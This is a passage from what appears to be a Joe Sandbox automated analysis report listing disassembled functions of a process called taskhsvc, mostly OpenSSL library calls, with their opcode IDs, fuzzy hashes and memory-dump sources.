                                                            • Instruction ID: db33ae0bc39bceb8bf2768211147eccfad91cf678b9cb013363685f9cc74af0a
                                                            • Opcode Fuzzy Hash: 12a7f8b0226f6cafa48f786183e43e4805f833575672391a97f6a1e4b7bc3c75
                                                            • Instruction Fuzzy Hash: 49B110B0A083059FD710DF29C48079ABBF5EF85348F62C91DE8988B750D779E946CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: d4a775facdcceb7d21200caef1eba999ea16f6bc1ddafcd073cbc9b7231e9e50
                                                            • Instruction ID: 3f7916274eff846b1d7b1fb1d64185293efb03e0d696a42156a79de434bf3589
                                                            • Opcode Fuzzy Hash: d4a775facdcceb7d21200caef1eba999ea16f6bc1ddafcd073cbc9b7231e9e50
                                                            • Instruction Fuzzy Hash: 7991E035618A409FDB50EF39C240A5AB7F1FB89318F42991CE6A8AB704D731F905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: s$v
                                                            • API String ID: 1457121658-3782752948
                                                            • Opcode ID: a38b26ef099a85d83c5b31bcb66c24453b3723df60c9fadcc3adf9779dd37c30
                                                            • Instruction ID: ef6073e6f78244eb370c7f0dd1eb1fbacf4274cfd6aea42196b41cc3b277e314
                                                            • Opcode Fuzzy Hash: a38b26ef099a85d83c5b31bcb66c24453b3723df60c9fadcc3adf9779dd37c30
                                                            • Instruction Fuzzy Hash: E4612775619701DFDB50DF25D684A4BBBF1BB89348F42981DEAA49B700D331E805CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32(?,?,?,?,?,?,?,00000000,?,00000000,00000000,6CF6BA8F), ref: 6CF6EF37
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: g
                                                            • API String ID: 1457121658-30677878
                                                            • Opcode ID: 40958b0451e5804babae5f9365ebe4e6a753ba73e47df7a6987a1e6c5ba16cb8
                                                            • Instruction ID: ac97165d9f8720b84606e6b82fe24f9abb234094028bcadaaf091f595b751ec7
                                                            • Opcode Fuzzy Hash: 40958b0451e5804babae5f9365ebe4e6a753ba73e47df7a6987a1e6c5ba16cb8
                                                            • Instruction Fuzzy Hash: 8B516C725197059FCB10DF26D98064BBBF4FB89308F06891DE6945BB00D731B94A8BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ENGINE_init.LIBEAY32 ref: 6CEF4FB9
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • ENGINE_get_pkey_meth.LIBEAY32 ref: 6CEF4FCD
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CEF4FF3
                                                            • ENGINE_get_pkey_meth_engine.LIBEAY32 ref: 6CEF5073
                                                            • sk_find.LIBEAY32 ref: 6CEF509E
                                                            • OBJ_bsearch_.LIBEAY32 ref: 6CEF50D2
                                                            • ERR_put_error.LIBEAY32 ref: 6CEF5187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_get_pkey_methE_get_pkey_meth_engineE_initJ_bsearch_O_mallocR_put_errorsk_find
                                                            • String ID: A
                                                            • API String ID: 2147540215-3554254475
                                                            • Opcode ID: 13fde9a4f22fdb2d7e8794940bc6e8df3f55596c14dc35df34c4b2e3e63977f1
                                                            • Instruction ID: 6612de9bfc085d737fffe8493af9c6852e4f3b0450b2206597450613a0a01e80
                                                            • Opcode Fuzzy Hash: 13fde9a4f22fdb2d7e8794940bc6e8df3f55596c14dc35df34c4b2e3e63977f1
                                                            • Instruction Fuzzy Hash: EB512AB160A7029FE7009F25C58475BBBF4AF81348F61C92CD4A88BB40E779D54ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$O_printf$N1_item_i2dN1_item_i2d_bioO_newO_s_memT_it__stack_chk_fail
                                                            • String ID: x
                                                            • API String ID: 3979484556-2363233923
                                                            • Opcode ID: 759d2fc121a8a16b4aa0c9e0ee35f09c62615e4fa763af299feb4843001f3559
                                                            • Instruction ID: 6a68910f970dd9a5e31bc5c9e72469bec628dd84758ea5a6dcf52fb1f08fe5c2
                                                            • Opcode Fuzzy Hash: 759d2fc121a8a16b4aa0c9e0ee35f09c62615e4fa763af299feb4843001f3559
                                                            • Instruction Fuzzy Hash: D44106B1608705CBDB10DF25D58429FBBF4AF84348F16882EE8D88BB10E776D444DBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 812f1abc50ac869a83d12fcdcaac6d1e571bc0da1d95bb51cb1cd972619cd423
                                                            • Instruction ID: b19e5409589f02c239d7512492c2388722c108ff4ec4a352809ca6592b0db45c
                                                            • Opcode Fuzzy Hash: 812f1abc50ac869a83d12fcdcaac6d1e571bc0da1d95bb51cb1cd972619cd423
                                                            • Instruction Fuzzy Hash: D7A16D31618B018FDB20DF29D54065BBBF1FB89318F02891EE6A5AB740D731E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 1e63d9b8a8fd6da2865a29af59abe79322c9407483965b52e1a7a2e76049b661
                                                            • Instruction ID: c979739c8a456843aa9b368a56e0b0e077decb257e9731becd5fa6f331e0f07c
                                                            • Opcode Fuzzy Hash: 1e63d9b8a8fd6da2865a29af59abe79322c9407483965b52e1a7a2e76049b661
                                                            • Instruction Fuzzy Hash: D8810931504A009FDF20EF79D64064BB7F1AB8A318F13DA1DD668DB204D731B9068FAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: S_encrypt1__stack_chk_fail
                                                            • String ID: v
                                                            • API String ID: 2067885017-1801730948
                                                            • Opcode ID: 6d097e046239619762b3683a7f1e3f2132097484b9f2dc8cec2de3a0b5fc4bb4
                                                            • Instruction ID: 8e6e8b21fcbef1613cef59e228bde8d4f7377b2f68ed3d89ac2582a97f1cb6bc
                                                            • Opcode Fuzzy Hash: 6d097e046239619762b3683a7f1e3f2132097484b9f2dc8cec2de3a0b5fc4bb4
                                                            • Instruction Fuzzy Hash: 5512F2756097418FC720CF29C580A4BFBF5BFDA208F55896DEA989B311D330E905CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: C$j
                                                            • API String ID: 4216919130-3507651435
                                                            • Opcode ID: 1cda71d1aedfac592151a20650ade077c0d0394394458fb651649f6c510ecda7
                                                            • Instruction ID: 1cb37d6e703ea05bc2e87f886f32fa8b37049d09c123c70e8dd21df4861da033
                                                            • Opcode Fuzzy Hash: 1cda71d1aedfac592151a20650ade077c0d0394394458fb651649f6c510ecda7
                                                            • Instruction Fuzzy Hash: AB91E7795187409FDB10DF69C680A5BBBF1FB89318F12891CEAA8A7310D335E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$O_lock$strcmp
                                                            • String ID: C$g$x${${
                                                            • API String ID: 107333257-644820815
                                                            • Opcode ID: 1cd9c55046383a13943eea091d77dbeb6e9986e8c5fc0c2ab5bdbc70487ddb02
                                                            • Instruction ID: d2174e16bd1336493e53c66cbfcf115fcda5033d666178f12a65728417429988
                                                            • Opcode Fuzzy Hash: 1cd9c55046383a13943eea091d77dbeb6e9986e8c5fc0c2ab5bdbc70487ddb02
                                                            • Instruction Fuzzy Hash: AC5126B560C342DBE700EF66D14436ABBF0BB81348F21891DE5A85BB50C7B9A549CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_s_file
                                                            • String ID:
                                                            • API String ID: 3660339215-0
                                                            • Opcode ID: 4be1e2749e92da420e3a34365106736ed413088142cdb0356caa2ce6b9823ced
                                                            • Instruction ID: 38cdd541b3a0b70c18240205be850bb8a704d5910faff9cc79baf2a64462eb12
                                                            • Opcode Fuzzy Hash: 4be1e2749e92da420e3a34365106736ed413088142cdb0356caa2ce6b9823ced
                                                            • Instruction Fuzzy Hash: 3D6159B16087018FD710DF29C58069BBBF1FF85358F22C92EE5A88B700D731E9168B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objX509_i2d_
                                                            • String ID: f$u$u
                                                            • API String ID: 2794517210-2092794679
                                                            • Opcode ID: fc71b548b41bcdfd96eebec6491b07a185acdfae8b5f6c6918beefdee376d3ef
                                                            • Instruction ID: e25dd6eb408f8dca402ae00d103788641d585f9f9a44c1866bca111c8881d9ac
                                                            • Opcode Fuzzy Hash: fc71b548b41bcdfd96eebec6491b07a185acdfae8b5f6c6918beefdee376d3ef
                                                            • Instruction Fuzzy Hash: C051DDB05097019FD350DF29C19475BBBF4BF89748F20882EE9998B750E779A848CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_VERIFY_PARAM_new.LIBEAY32 ref: 6CF3B010
                                                              • Part of subcall function 6CF46510: CRYPTO_malloc.LIBEAY32 ref: 6CF46539
                                                              • Part of subcall function 6CF46510: CRYPTO_malloc.LIBEAY32 ref: 6CF46582
                                                              • Part of subcall function 6CF46510: sk_pop_free.LIBEAY32 ref: 6CF46605
                                                              • Part of subcall function 6CF46510: sk_pop_free.LIBEAY32 ref: 6CF46625
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF4663A
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF46650
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF4666D
                                                            • X509_policy_tree_free.LIBEAY32 ref: 6CF3B0AD
                                                            • sk_pop_free.LIBEAY32 ref: 6CF3B0CB
                                                            • CRYPTO_free_ex_data.LIBEAY32 ref: 6CF3B0E6
                                                            • ERR_put_error.LIBEAY32 ref: 6CF3B072
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B032
                                                              • Part of subcall function 6CF466E0: sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467A6
                                                              • Part of subcall function 6CF466E0: sk_new_null.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467B3
                                                              • Part of subcall function 6CF466E0: sk_num.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46809
                                                              • Part of subcall function 6CF466E0: sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46843
                                                              • Part of subcall function 6CF466E0: sk_deep_copy.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4686F
                                                            • X509_VERIFY_PARAM_lookup.LIBEAY32 ref: 6CF3B132
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B141
                                                            • ERR_put_error.LIBEAY32 ref: 6CF3B1F7
                                                            • X509_VERIFY_PARAM_free.LIBEAY32 ref: 6CF3B213
                                                            • X509_VERIFY_PARAM_lookup.LIBEAY32 ref: 6CF3B229
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B238
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_$sk_pop_free$M_inheritO_free$M_lookupO_mallocR_put_error$M_freeM_newO_free_ex_dataR_get_stateX509_policy_tree_freesk_deep_copysk_new_nullsk_num
                                                            • String ID: A$A
                                                            • API String ID: 2267118288-2116726341
                                                            • Opcode ID: 567fee929aca5ecd84857c7e7a1eb3914da835ed2a0d176510df3b16bbaac151
                                                            • Instruction ID: 126442d4f24c0c99af3ab68831e2dc79c31171a737f564d5a0e20db99abbdec3
                                                            • Opcode Fuzzy Hash: 567fee929aca5ecd84857c7e7a1eb3914da835ed2a0d176510df3b16bbaac151
                                                            • Instruction Fuzzy Hash: 6B91F0B0609B11DBEB50CF29C1A431BBBE4BF44308F119A5DD8988FA4AD779D444CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_getsR_put_error
                                                            • String ID: f
                                                            • API String ID: 1595383539-1993550816
                                                            • Opcode ID: 1df63f7a816ae6600dd5dc339973eab6ba1519b4f53672a4fbf173d7ab438bf3
                                                            • Instruction ID: a0801692d7c8c2872f374cf8e512666f1b8064f53a18b0523460c28dbe2a6cd3
                                                            • Opcode Fuzzy Hash: 1df63f7a816ae6600dd5dc339973eab6ba1519b4f53672a4fbf173d7ab438bf3
                                                            • Instruction Fuzzy Hash: 1EA153B150D3829FD300CF29C18474AFBF1AF86308F56895EE4E88BB51D3B6D8498B52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 838ba1976bb6e97fc2cab67808834e6b29760c679b0a5ed073df95e1815fbcd4
                                                            • Instruction ID: 77a7269ee8720641cfa138f80407d24007cb11710c1625152aad78e9dbf9d44d
                                                            • Opcode Fuzzy Hash: 838ba1976bb6e97fc2cab67808834e6b29760c679b0a5ed073df95e1815fbcd4
                                                            • Instruction Fuzzy Hash: 435121B16097018AEB10DF25C981B5BBBF5BF91748F21880EE9A88BB50D739D445CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_find
                                                            • String ID: E
                                                            • API String ID: 1886783827-3568589458
                                                            • Opcode ID: c367471e8c1b08c4554f579b6e7b6725604d8c99b9f0fe3e85b5a1b646f82dcd
                                                            • Instruction ID: 5c662f27fc54aebe07ed58027905777728633a3f10889ae99b3cc59629451caf
                                                            • Opcode Fuzzy Hash: c367471e8c1b08c4554f579b6e7b6725604d8c99b9f0fe3e85b5a1b646f82dcd
                                                            • Instruction Fuzzy Hash: 017167352196819FDB10DF25C680A4BBBF4FB99318F06991CEAA997741D730F904CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$u
                                                            • API String ID: 0-1604213488
                                                            • Opcode ID: 290faf510abc2f4f63570d49ffb57e0574640a9169242f7cb0f6e9c90b2ee5f9
                                                            • Instruction ID: e079722df76868506812dae01057b5f7a9b97277afd54289314eeaf7b3322a38
                                                            • Opcode Fuzzy Hash: 290faf510abc2f4f63570d49ffb57e0574640a9169242f7cb0f6e9c90b2ee5f9
                                                            • Instruction Fuzzy Hash: 0A415571608711AFD700DF29C98025BBBF1BB89318F469A1DE998CB740E735E9448FDA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • i2d_NETSCAPE_SPKI.LIBEAY32 ref: 6CF36FD1
                                                              • Part of subcall function 6CF0A200: ASN1_item_i2d.LIBEAY32 ref: 6CF0A225
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF36FEB
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF37008
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF37063
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF3706B
                                                            • ERR_put_error.LIBEAY32 ref: 6CF37097
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$N1_item_i2dR_put_errori2d_
                                                            • String ID: A$u
                                                            • API String ID: 1687252276-1604213488
                                                            • Opcode ID: a1243b9cd7ad24f2e37602766a0b778ddc111fb60ab4e69850bb7aa1a029ce87
                                                            • Instruction ID: 044697df33f02515ca5026069cabf8bb56e510911769046deff85069e9b16d60
                                                            • Opcode Fuzzy Hash: a1243b9cd7ad24f2e37602766a0b778ddc111fb60ab4e69850bb7aa1a029ce87
                                                            • Instruction Fuzzy Hash: E32115B55087049FD300AF29C58075FBBF4EF84788F12892DE8C88B711E77995889F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF34748), ref: 6CF44E23
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 622be3377e311017335c4d389de238e32805722aaea76e5ad43a5097c6fa6850
                                                            • Instruction ID: c8d9ef98855956a1df6f5798a0ba862f33e1622717340ce39a8535dba5a20571
                                                            • Opcode Fuzzy Hash: 622be3377e311017335c4d389de238e32805722aaea76e5ad43a5097c6fa6850
                                                            • Instruction Fuzzy Hash: 968110356187409FDB10EF69C580A4BBBF5BB89358F46C91CEA649B701D330E905CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eae98bdf8065b186ad2ea29e19518773607a5df86bad04a3693e94a7190c6574
                                                            • Instruction ID: 82640e1522f485de0595b422442f560f4e789038c5a6aaf7f9ac571f56712c82
                                                            • Opcode Fuzzy Hash: eae98bdf8065b186ad2ea29e19518773607a5df86bad04a3693e94a7190c6574
                                                            • Instruction Fuzzy Hash: 0B711F35608A419FDB24DF39D55051B77F1BB8932CF41861EDA66ABB80CB30E901CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03feded89f3c9b557f6249ed0ccfae01094b51f9146f77bbea45f4dbc7dad6ec
                                                            • Instruction ID: e3b1028c6f7f1d222093ef7d1b167365572c6e5dd7eeca1149614a5681b1603f
                                                            • Opcode Fuzzy Hash: 03feded89f3c9b557f6249ed0ccfae01094b51f9146f77bbea45f4dbc7dad6ec
                                                            • Instruction Fuzzy Hash: 3C719131A18A408FDB20EF3EC54164B77F2AB4A35CF66C61ED6609BB04D731E905CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $ $
                                                            • API String ID: 0-2376886710
                                                            • Opcode ID: f225506dd347c59c8da16f945bff169f4b8ff24c9c3cf8b91f86100df37a8e92
                                                            • Instruction ID: 2cbf082231b7af9c36e78646193649df0811c4dd31563a9ff7b819672a67c578
                                                            • Opcode Fuzzy Hash: f225506dd347c59c8da16f945bff169f4b8ff24c9c3cf8b91f86100df37a8e92
                                                            • Instruction Fuzzy Hash: 62A108757083008FD714DF29C68065BBBF5BBCA308F158A2EE9A997740D731EA058B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$T$V
                                                            • API String ID: 0-4191120472
                                                            • Opcode ID: cdcef55a85dc1a00e9ca610a25ce4bd63ea79d9afdddb4fb0607a880d4f61162
                                                            • Instruction ID: 0766cb97468d2dd3ef01179d979cb8283681d021558fe0d43a3c54e36269c22f
                                                            • Opcode Fuzzy Hash: cdcef55a85dc1a00e9ca610a25ce4bd63ea79d9afdddb4fb0607a880d4f61162
                                                            • Instruction Fuzzy Hash: 0851CFB06057119BEB00DF29C59475BBBE4BF44308F11895CE9A88F68AD779D848CFE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509v3_add_ext__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1067766642-0
                                                            • Opcode ID: 5f7a208edf7d6aaf9d8d7ef6aee689189498d7489bfd90ddb26c07d264ec7ceb
                                                            • Instruction ID: 11e6861075de1caa0538636f25a70e2e1541ca4a1120622af899b9f18d294407
                                                            • Opcode Fuzzy Hash: 5f7a208edf7d6aaf9d8d7ef6aee689189498d7489bfd90ddb26c07d264ec7ceb
                                                            • Instruction Fuzzy Hash: 4081D3756187109FC704DF69C68090ABBF1BF8D318F469A5DEA99AB310D334EA01CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$j
                                                            • API String ID: 1767461275-3507651435
                                                            • Opcode ID: eb716ae5ef4001146e69d905c15cf33c45a57ea0a1b302869fa4fc93beec6f05
                                                            • Instruction ID: b0a5cd6c64dc37676f77b3dc2d6d7c7f5bd9b1da88643b27fc531896610b9acc
                                                            • Opcode Fuzzy Hash: eb716ae5ef4001146e69d905c15cf33c45a57ea0a1b302869fa4fc93beec6f05
                                                            • Instruction Fuzzy Hash: 2331D5BA5193059FE7409F25C54571BBBF0AB80398F11CC1CE8985B760D3BEE54A8F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4605ab27efe0155dd52eeb1b5ddc395a3d79e4db0c2b1260c45393769cf9af0f
                                                            • Instruction ID: 0dd6460110ca39bdd2c4638daa3a2b3ae52317e4d976b1394db70347d86d8d61
                                                            • Opcode Fuzzy Hash: 4605ab27efe0155dd52eeb1b5ddc395a3d79e4db0c2b1260c45393769cf9af0f
                                                            • Instruction Fuzzy Hash: 6FA1F2756093458FD724CFA9C080A9BBBF1BF89304F61892DE9989B714E775E805CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
